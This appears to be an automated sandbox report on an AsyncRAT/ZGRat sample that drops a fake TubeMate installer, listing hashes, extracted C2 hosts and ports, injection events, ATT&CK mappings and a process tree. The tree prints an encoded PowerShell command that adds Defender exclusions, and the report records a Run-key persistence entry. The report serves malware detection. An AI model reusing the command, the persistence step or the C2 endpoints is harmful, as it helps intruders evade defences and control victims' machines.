asyncrat | 3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0

Analysis

max time kernel
146s
max time network
144s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
11-05-2024 21:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

645793d9e9330d225a3b3dfd20e20064.exe
Size

48.5MB
MD5

645793d9e9330d225a3b3dfd20e20064
SHA1

4344014c90b9a3ec79750998cdc5b68df983cd59
SHA256

3644efb050a5e1733ca9dc4f6a32fba33883497c41121cf5a7de4837236690e0
SHA512

c8957f5fdf202f73e68d5e2397799f6f420b123df91743330e4d2495675c67e4d74a10e0030fb1c4d314dd1173a3b3c905db752f5d87600e8a8dcc18efb5297b
SSDEEP

1572864:Pwc6WzPrjxZFn1D0mNt1XhIEuX6LwkLXZwy:Z7BZd3f8uw

Score

10^/10

asyncrat zgrat default execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

5512.sytes.net:6606

5512.sytes.net:7707

5512.sytes.net:8808

95.211.208.153:6606

95.211.208.153:7707

95.211.208.153:8808

Mutex

Llg9a02PERRO

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect ZGRat V1 34 IoCs

resource	yara_rule
behavioral1/memory/2192-10-0x0000000004AA0000-0x0000000004CC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-13-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-14-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-16-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-18-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-32-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-30-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-28-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-26-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-24-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-22-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-74-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-66-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-62-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-56-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-44-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-20-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-36-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-34-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-76-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-72-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-70-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-68-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-64-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-60-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-58-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-54-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-52-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-50-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-48-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-46-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-42-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-40-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1
behavioral1/memory/2192-38-0x0000000004AA0000-0x0000000004CBA000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Executes dropped EXE 3 IoCs

pid	Process
2192	Dfzxuwcml.exe
3132	windows-tubemate-setup.exe
3264	windows-tubemate-setup.tmp

Loads dropped DLL 3 IoCs

pid	Process
1856	645793d9e9330d225a3b3dfd20e20064.exe
1856	645793d9e9330d225a3b3dfd20e20064.exe
3132	windows-tubemate-setup.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kpteiazy = "C:\\Users\\Admin\\AppData\\Roaming\\Kpteiazy.exe"	Dfzxuwcml.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2192 set thread context of 3292	2192	Dfzxuwcml.exe	34

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1632	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1632	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3264	windows-tubemate-setup.tmp

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	2192	Dfzxuwcml.exe
Token: SeDebugPrivilege	2192	Dfzxuwcml.exe
Token: SeDebugPrivilege	3292	AppLaunch.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 1856 wrote to memory of 1632	1856	645793d9e9330d225a3b3dfd20e20064.exe	28
PID 1856 wrote to memory of 1632	1856	645793d9e9330d225a3b3dfd20e20064.exe	28
PID 1856 wrote to memory of 1632	1856	645793d9e9330d225a3b3dfd20e20064.exe	28
PID 1856 wrote to memory of 1632	1856	645793d9e9330d225a3b3dfd20e20064.exe	28
PID 1856 wrote to memory of 2192	1856	645793d9e9330d225a3b3dfd20e20064.exe	30
PID 1856 wrote to memory of 2192	1856	645793d9e9330d225a3b3dfd20e20064.exe	30
PID 1856 wrote to memory of 2192	1856	645793d9e9330d225a3b3dfd20e20064.exe	30
PID 1856 wrote to memory of 2192	1856	645793d9e9330d225a3b3dfd20e20064.exe	30
PID 1856 wrote to memory of 3132	1856	645793d9e9330d225a3b3dfd20e20064.exe	31
PID 1856 wrote to memory of 3132	1856	645793d9e9330d225a3b3dfd20e20064.exe	31
PID 1856 wrote to memory of 3132	1856	645793d9e9330d225a3b3dfd20e20064.exe	31
PID 1856 wrote to memory of 3132	1856	645793d9e9330d225a3b3dfd20e20064.exe	31
PID 1856 wrote to memory of 3132	1856	645793d9e9330d225a3b3dfd20e20064.exe	31
PID 1856 wrote to memory of 3132	1856	645793d9e9330d225a3b3dfd20e20064.exe	31
PID 1856 wrote to memory of 3132	1856	645793d9e9330d225a3b3dfd20e20064.exe	31
PID 3132 wrote to memory of 3264	3132	windows-tubemate-setup.exe	33
PID 3132 wrote to memory of 3264	3132	windows-tubemate-setup.exe	33
PID 3132 wrote to memory of 3264	3132	windows-tubemate-setup.exe	33
PID 3132 wrote to memory of 3264	3132	windows-tubemate-setup.exe	33
PID 3132 wrote to memory of 3264	3132	windows-tubemate-setup.exe	33
PID 3132 wrote to memory of 3264	3132	windows-tubemate-setup.exe	33
PID 3132 wrote to memory of 3264	3132	windows-tubemate-setup.exe	33
PID 2192 wrote to memory of 3292	2192	Dfzxuwcml.exe	34
PID 2192 wrote to memory of 3292	2192	Dfzxuwcml.exe	34
PID 2192 wrote to memory of 3292	2192	Dfzxuwcml.exe	34
PID 2192 wrote to memory of 3292	2192	Dfzxuwcml.exe	34
PID 2192 wrote to memory of 3292	2192	Dfzxuwcml.exe	34
PID 2192 wrote to memory of 3292	2192	Dfzxuwcml.exe	34
PID 2192 wrote to memory of 3292	2192	Dfzxuwcml.exe	34
PID 2192 wrote to memory of 3292	2192	Dfzxuwcml.exe	34
PID 2192 wrote to memory of 3292	2192	Dfzxuwcml.exe	34
PID 2192 wrote to memory of 3292	2192	Dfzxuwcml.exe	34
PID 2192 wrote to memory of 3292	2192	Dfzxuwcml.exe	34
PID 2192 wrote to memory of 3292	2192	Dfzxuwcml.exe	34

C:\Users\Admin\AppData\Local\Temp\645793d9e9330d225a3b3dfd20e20064.exe
"C:\Users\Admin\AppData\Local\Temp\645793d9e9330d225a3b3dfd20e20064.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1856
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbgBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAZABxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AeQByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdAB4ACMAPgA="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1632
- C:\Users\Admin\AppData\Local\Dfzxuwcml.exe
  "C:\Users\Admin\AppData\Local\Dfzxuwcml.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2192
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3292
- C:\Users\Admin\AppData\Local\Temp\windows-tubemate-setup.exe
  "C:\Users\Admin\AppData\Local\Temp\windows-tubemate-setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3132
- - C:\Users\Admin\AppData\Local\Temp\is-289PQ.tmp\windows-tubemate-setup.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-289PQ.tmp\windows-tubemate-setup.tmp" /SL5="$80120,48138664,121344,C:\Users\Admin\AppData\Local\Temp\windows-tubemate-setup.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: GetForegroundWindowSpam
    PID:3264

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Dfzxuwcml.exe

Filesize
2.2MB

MD5
577b8f4cd65df6e3cd42d7d37c7917cf

SHA1
5033814e5aade04682bf7cb7fca3e32c46c5512a

SHA256
d4360ef0464f7620fe0e3d5185adcdc0781aacfe23510d2c6c2e85c1095c8948

SHA512
a42dab76abe41e53d7eee1ff3cec3092b26e1a05bdd6c91e8f12e35f6f14fc36df5ef918d0a2818d9f549db1e8ace169ff8ed3f441253a9a27b89c1ec816ff9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-289PQ.tmp\windows-tubemate-setup.tmp

Filesize
1.1MB

MD5
34acc2bdb45a9c436181426828c4cb49

SHA1
5adaa1ac822e6128b8d4b59a54d19901880452ae

SHA256
9c81817acd4982632d8c7f1df3898fca1477577738184265d735f49fc5480f07

SHA512
134ff4022571efd46f7a62e99b857ebe834e9916c786345908010f9e1fb90be226b740ddee16ae9290fe45c86be7238c4555e422abe66a461d11545e19734beb

Download Submit
\Users\Admin\AppData\Local\Temp\windows-tubemate-setup.exe

Filesize
46.3MB

MD5
91d80adacf5e1e6686c209315197e4d1

SHA1
381a7ae480e94829d1173593af2eec981d47863a

SHA256
edf5656d1d254315ebe90b6365ee72f422cf64248da8cf885a9aa9dade46b824

SHA512
9624bf5188c675a25635f23dfe38c886e1cd2be5f69f7bec360ffe8d467c5ecff2836906fe1a129b96a3ea26c91b9fc6149002af5c9dd62c603cbe9f5d2e121a

Download Submit
memory/2192-34-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-40-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-16-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-18-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-32-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-30-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-28-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-26-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-24-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-22-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-74-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-66-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-62-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-70-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-44-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-20-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-36-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-13-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-9-0x0000000000080000-0x00000000002B2000-memory.dmp

Filesize
2.2MB

Download
memory/2192-14-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-56-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-68-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-64-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-60-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-58-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-54-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-52-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-50-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-4894-0x0000000004750000-0x000000000479C000-memory.dmp

Filesize
304KB

Download
memory/2192-4893-0x0000000004310000-0x000000000436C000-memory.dmp

Filesize
368KB

Download
memory/2192-48-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-46-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-42-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-72-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-38-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/2192-10-0x0000000004AA0000-0x0000000004CC0000-memory.dmp

Filesize
2.1MB

Download
memory/2192-4903-0x00000000049F0000-0x0000000004A44000-memory.dmp

Filesize
336KB

Download
memory/2192-76-0x0000000004AA0000-0x0000000004CBA000-memory.dmp

Filesize
2.1MB

Download
memory/3292-4922-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download